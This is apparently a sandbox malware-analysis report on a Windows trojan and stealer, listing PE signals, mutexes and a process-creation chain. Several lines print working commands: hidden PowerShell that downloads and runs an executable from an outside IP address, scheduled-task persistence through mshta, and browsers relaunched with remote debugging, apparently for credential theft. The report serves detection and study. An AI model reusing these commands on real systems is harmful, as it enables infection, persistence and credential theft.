                                                Source: random[2].exe0.16.drStatic PE information: Section: qqigmylm ZLIB complexity 0.9950102390035906
                                                Source: f0b421a199.exe.16.drStatic PE information: Section: ZLIB complexity 0.999706737987988
                                                Source: f0b421a199.exe.16.drStatic PE information: Section: qqigmylm ZLIB complexity 0.9950102390035906
                                                Source: random[3].exe.16.drStatic PE information: Section: hjgvekwy ZLIB complexity 0.994908279890489
                                                Source: 5ef8bafe70.exe.16.drStatic PE information: Section: hjgvekwy ZLIB complexity 0.994908279890489
                                                Source: random[2].exe1.16.drStatic PE information: Section: kxuwrjnk ZLIB complexity 0.9944404726068633
                                                Source: df2fea7261.exe.16.drStatic PE information: Section: kxuwrjnk ZLIB complexity 0.9944404726068633
                                                Source: vertualiziren[1].exe.22.drStatic PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
                                                Source: vertualiziren.exe.22.drStatic PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
                                                Source: benskvi.exe.24.drStatic PE information: Section: yuxfscdw ZLIB complexity 0.9944930111069277
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: Section: ZLIB complexity 0.9988700929752066
                                                Source: TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE.35.drStatic PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: Section: ZLIB complexity 0.9988700929752066
                                                Source: 483d2fa8a0d53818306efeb32d3.exe.58.drStatic PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: Section: ZLIB complexity 0.9988700929752066
                                                Source: TempJAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE.67.drStatic PE information: Section: vbshiqxp ZLIB complexity 0.9947482121573301
                                                Source: vertualiziren.exe.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                                Source: vertualiziren[1].exe.22.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                                Source: random[1].exe.16.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                                Source: 7dbaa342f5.exe.16.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                                Source: benskvi.exe.24.drStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                                Source: random[1].exe0.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                                Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                                Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                                Source: acd63ce6fe.exe.16.dr, gBMthepoZSL1ZVKpeA.csCryptographic APIs: 'CreateDecryptor'
                                                Source: classification engineClassification label: mal100.spre.phis.troj.spyw.expl.evad.winEXE@131/130@932/100
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C837B5 GetLastError,FormatMessageW,0_2_00C837B5
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C710BF AdjustTokenPrivileges,CloseHandle,0_2_00C710BF
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C716C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00C716C3
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C851CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00C851CD
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C9A67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00C9A67C
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C8648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00C8648E
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeCode function: 0_2_00C142A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C142A2
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\nhDLtPT[1].exe
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8012:120:WilError_03
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7280:120:WilError_03
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4772:120:WilError_03
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2876:120:WilError_03
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeMutant created: \Sessions\1\BaseNamedObjects\bf11e9eb444cca0553e5dc41fdf05974
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                                                Source: C:\ProgramData\jnxnee\benskvi.exeMutant created: \Sessions\1\BaseNamedObjects\Test Task17
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3544:120:WilError_03
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6816:120:WilError_03
                                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1884:120:WilError_03
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeFile created: C:\Users\user\AppData\Local\Temp\sGwBNuRjx.htaJump to behavior
                                                Source: aV2ffcSuKl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                Source: C:\Windows\SysWOW64\mshta.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor
                                                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2552179912.000000006BB5F000.00000002.00000001.01000000.0000001C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                                                Source: ILqcVeT.exe, 00000017.00000003.2107115076.0000000005839000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000003.2232259653.000000000582D000.00000004.00000020.00020000.00000000.sdmp, rXOl0pp.exe, 00000019.00000003.2552037414.0000000005E49000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                                                Source: ILqcVeT.exe, 00000017.00000002.2506968067.0000000005AB2000.00000004.00000020.00020000.00000000.sdmp, ILqcVeT.exe, 00000017.00000002.2549910673.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                                                Source: aV2ffcSuKl.exeVirustotal: Detection: 68%
                                                Source: aV2ffcSuKl.exeReversingLabs: Detection: 63%
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: " /add
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: " /add /y
                                                Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                                Source: rapes.exeString found in binary or memory: " /add
                                                Source: rapes.exeString found in binary or memory: " /add /y
                                                Source: rapes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                                Source: rapes.exeString found in binary or memory: " /add
                                                Source: rapes.exeString found in binary or memory: " /add /y
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: " /add
                                                Source: TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEString found in binary or memory: " /add /y
                                                Source: nhDLtPT.exeString found in binary or memory: " /add
                                                Source: nhDLtPT.exeString found in binary or memory: " /add /y
                                                Source: Gxtuum.exeString found in binary or memory: " /add
                                                Source: Gxtuum.exeString found in binary or memory: " /add /y
                                                Source: unknownProcess created: C:\Users\user\Desktop\aV2ffcSuKl.exe "C:\Users\user\Desktop\aV2ffcSuKl.exe"
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'P9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXEProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
                                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE "C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXE"
                                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe "C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeProcess created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe "C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeProcess created: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe "C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe "C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2436 --field-trial-handle=2156,i,114299149771300209,1457107996023773148,262144 /prefetch:8
                                                Source: unknownProcess created: C:\ProgramData\jnxnee\benskvi.exe C:\ProgramData\jnxnee\benskvi.exe
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn flwMsmavzAp /tr "mshta C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\rKRHHhiYP.hta
                                                Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2228,i,8936571210459543028,10198378582791773127,262144 /prefetch:3
                                                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2136,i,8097992319961427004,17557995905178344852,262144 /prefetch:3
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10111060121\am_no.cmd" "
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE "C:\Users\user\AppData\Local\TempUBI6CWIX4UP8VUJR6IRMVEHAKPW6ZCWX.EXE"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "U6NDLmaxnYP" /tr "mshta \"C:\Temp\plDCQRtK9.hta\"" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\plDCQRtK9.hta"
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: unknownProcess created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "C:\Temp\plDCQRtK9.hta"
                                                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe "C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeProcess created: C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe "C:\Users\user\AppData\Local\Temp\10111180101\7dbaa342f5.exe"
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Users\user\AppData\Local\Temp\10111050101\132fd7f0ed.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UIP4BmakpNx /tr "mshta C:\Users\user\AppData\Local\Temp\1lEt3ife9.hta" /sc minute /mo 25 /ru "user" /f
                                                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'JAW3XTC7QCB11DRDHXKDZL05FSNPG4P3.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
                                                Source: C:\Users\user\Desktop\aV2ffcSuKl.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.htaJump to behavior
                                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn bseb5ma1dDD /tr "mshta C:\Users\user\AppData\Local\Temp\sGwBNuRjx.hta" /sc minute /mo 25 /ru "user" /fJump to behavior
